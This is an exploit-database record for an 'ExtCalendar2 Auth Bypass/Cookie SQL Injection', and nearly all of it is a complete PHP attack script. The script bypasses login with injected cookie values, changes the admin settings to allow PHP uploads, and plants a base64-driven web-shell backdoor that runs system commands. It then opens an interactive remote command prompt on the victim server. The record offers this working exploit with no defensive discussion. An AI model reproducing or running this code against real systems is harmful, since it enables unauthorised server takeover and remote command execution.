ExtCalendar2 (Auth Bypass/Cookie) SQL Injection

2011-07-23T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-20755", "status": "poc", "bulletinFamily": "exploit", "modified": "2011-07-23T00:00:00", "title": "ExtCalendar2 (Auth Bypass/Cookie) SQL Injection", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20755", "cvelist": [], "description": "No description provided by source.", "viewCount": 13, "published": "2011-07-23T00:00:00", "sourceData": "\n <?\r\nif(!$argv[1])\r\ndie("\r\n \r\nUsage : php exploit.php [site]\r\nExample : php exploit.php http://site.tld/calendar/\r\n \r\n");\r\nprint_r("\r\n \r\n# Exploit....: [ ExtCalendar2 (Auth Bypass/Cookie) SQL Injection ]\r\n# Author.....: [ Lagripe-Dz ]\r\n# Date.......: [ 05-o6-2o11 ]\r\n# Twitter ...: [ @Lagripe_Dz ]\r\n# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]\r\n# Download ..: [ http://sourceforge.net/projects/extcal/ ]\r\n# Video .....: [ http://www.youtube.com/watch?v=2aatog92oqU ]\r\n \r\n -==[ ExPloiT ]==-\r\n \r\njavascript:document.cookie=\\"ext20_username=admin ' or '1'= '1\\";\r\njavascript:document.cookie=\\"ext20_password=admin ' or '1'= '1\\";\r\n \r\n -==[ Start ]==-\r\n \r\n");\r\n \r\n$target = $argv[1];\r\n \r\nif(!extension_loaded("curl")){ die("error::cURL extension required"); }\r\n \r\n# first get cookie prefix from page source ( xxx_username by default > ext20_username )\r\npreg_match_all('#extcal_cookie_id = "(.*)"#', DzCURL($target,0,0) , $prf);\r\n$prefix = $prf[1][0];\r\n \r\n# header ..\r\n$header[] = "Cookie: ".$prefix."_username=admin ' or '1'= '1; ".$prefix."_password=admin ' or '1'= '1;";\r\n \r\n# check if it's work by looking for [ logout ]\r\necho (eregi("logout", DzCURL($target,0,$header))) ? "# Login :D\\n":die("# Failed : Can't Login");\r\n \r\n# data of new settings with allowed php extension\r\n \r\n$new_settings = Array(\r\n "calendar_name" => "Calendar name","calendar_description" => "Calendar description",\r\n "calendar_admin_email" => "Calendar Administrator email","cookie_name" => "ext20",\r\n "cookie_path" => "/","debug_mode" => 1,"calendar_status" => 1,"lang" => "english",\r\n "charset" => "language-file","theme" => "default","timezone" => 1,"time_format_24hours" => 1,\r\n "auto_daylight_saving" => 1,"main_table_width" => "50%","day_start" => 1,"default_view" => 1,\r\n "search_view" => 1,"archive" => 1,"events_per_page" => 5,"sort_order" => "ta",\r\n "show_recurrent_events" => 1,"multi_day_events" => "all","legend_cat_columns" => 5,\r\n "allow_user_registration" => 1,"reg_duplicate_emails" => 1,"reg_email_verify" => 1,\r\n "popup_event_mode" => 1,"popup_event_width" => 1,"popup_event_height" => 1,\r\n "add_event_view" => 1,"addevent_allow_html" => 1,"addevent_allow_contact" => 1,\r\n "addevent_allow_email" => 1,"addevent_allow_url" => 1,"addevent_allow_picture" => 1,\r\n "new_post_notification" => 1,"monthly_view" => 1,"cal_view_show_week" => 1,\r\n "cal_view_max_chars" => 100,"flyer_view" => 1,"flyer_show_picture" => 1,\r\n "flyer_view_max_chars" => 100,"weekly_view" => 1,"weekly_view_max_chars" => 100,\r\n "daily_view" => 1,"daily_view_max_chars" => 100,"cats_view" => 1,"cats_view_max_chars" => 100,\r\n "mini_cal_def_picture" => 1,"mini_cal_diplay_options" => "default","mail_method" => "smtp",\r\n "mail_smtp_host" => 0,"mail_smtp_auth" => 1,"mail_smtp_username" => 0,"mail_smtp_password" => 0,\r\n "max_upl_dim" => 99999999999999999,"max_upl_size" => 99999999999999999,"picture_chmod" => 755,\r\n "allowed_file_extensions" => "PHP/PY/PERL/HTACCESS/ASP/ASPX","update_config" => "Save New Configuration");\r\n \r\n# post data and check if settings updated and php added\r\necho (eregi("<strong>.*</strong>", DzCURL($target."admin_settings.php",$new_settings,$header))) ? "# Settings Updated :D\\n":die("# Failed : can't update settings");\r\n \r\n# get event id for connect 2 backdoor\r\n$events = DzCURL($target."admin_events.php?eventfilter=0",0,$header);\r\npreg_match_all('#edit&id=(:?[0-9]+)#' ,$events ,$r );\r\n \r\n# backdoor xD\r\n \r\n$bd = "<?\r\necho Exe(base64_decode(\\$_GET[dz]));\r\nfunction Exe(\\$command)\r\n{\r\n if(function_exists('passthru')){\\$exec = passthru(\\$command);}\r\n elseif(function_exists('system') && !\\$exec){\\$exec= system(\\$command); }\r\n elseif(function_exists('exec') && !\\$exec){exec(\\$command,\\$output);\\$exec=join(\\"\\n\\",\\$output);}\r\n elseif(function_exists('shell_exec') && !\\$exec){\\$exec=shell_exec(\\$command);}\r\n elseif(function_exists('popen') && !\\$exec){\\$fp = popen(\\$command,\\"r\\");\r\n {while(!feof(\\$fp)){\\$result.=fread(\\$fp,1024);}pclose(\\$fp);}\\$exec = convert_cyr_string(\\$result,\\"d\\",\\"w\\");}\r\n elseif(function_exists('win_shell_execute') && !\\$exec){\\$exec = winshell(\\$command);}\r\n elseif(function_exists('win32_create_service') && !\\$exec){\\$exec=srvshell(\\$command);}\r\n elseif(extension_loaded('ffi') && !\\$exec){\\$exec=ffishell(\\$command);}\r\n elseif(extension_loaded('perl') && !\\$exec){\\$exec=perlshell(\\$command);}\r\n elseif(!\\$exec) {\\$exec = slashBypass(\\$command);}\r\n elseif(!\\$exec && extension_loaded('python'))\r\n {\\$exec = python_eval(\\"import os\r\n pwd = os.getcwd()\r\n print pwd\r\n os.system('\\".\\$command.\\"')\\");}\r\n elseif(\\$exec){return \\$exec;}\r\n}\r\n?>";\r\n# make bd\r\nfile_put_contents("dz.php",$bd);\r\n \r\n# new event with php backdoor\r\n$post_bd = array(\r\n "mode"=>"edit","id"=>$r[1][0],"title"=>"blabla",\r\n "description"=>"bla bla bla ,,,","cat"=> 1,\r\n "day"=> 22,"month"=> 11,"year"=>2011,\r\n "picture"=>"@".realpath("dz.php"),\r\n "submit"=>" Update Event ");\r\n \r\n# post backdoor & check\r\necho (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\\n":die("# Failed : can't upload Backdoor");\r\n \r\n@unlink("dz.php"); # del backdoor after uploading\r\n \r\n# looking for backdoor\r\npreg_match_all('#upload/(:?[a-z0-9]+)_dz.php#' ,DzCURL($target."admin_events.php?mode=view&id=".$r[1][0],0,$header) ,$r2 );\r\n \r\necho (!$r2[0][0]) ? die("# Failed : Backdoor not found !"):"";\r\n \r\n# connecting with backdoor :P\r\nwhile(1) {\r\n fwrite(STDOUT, "\\ncmd~# ");\r\n // (trim((fgets(STDIN))) == "exit") ? exit:""; // exit from loop\r\n $cmd = base64_encode(trim((fgets(STDIN))));\r\n echo DzCURL($target.$r2[0][0]."?dz=".$cmd ,0,0);\r\n }\r\n \r\n# function ... \r\n \r\nfunction DzCURL($url,$posts ,$header){\r\n \r\n$curl=curl_init();\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1);\r\nif(is_array($header)){\r\ncurl_setopt($curl, CURLOPT_HTTPHEADER, $header);\r\n}\r\ncurl_setopt($curl,CURLOPT_URL,$url);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL =)');\r\ncurl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);\r\nif(is_array($posts)){\r\ncurl_setopt($curl,CURLOPT_POST,1);\r\ncurl_setopt($curl,CURLOPT_POSTFIELDS,$posts);\r\n}\r\ncurl_setopt($curl,CURLOPT_TIMEOUT,5);\r\n \r\n$exec=curl_exec($curl);\r\ncurl_close($curl);\r\nreturn $exec;\r\n}\r\n# _EOF\r\n?>\n ", "id": "SSV:20755", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:02:31", "reporter": "Root", "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645316361, "score": 1659785532, "epss": 1678850553}}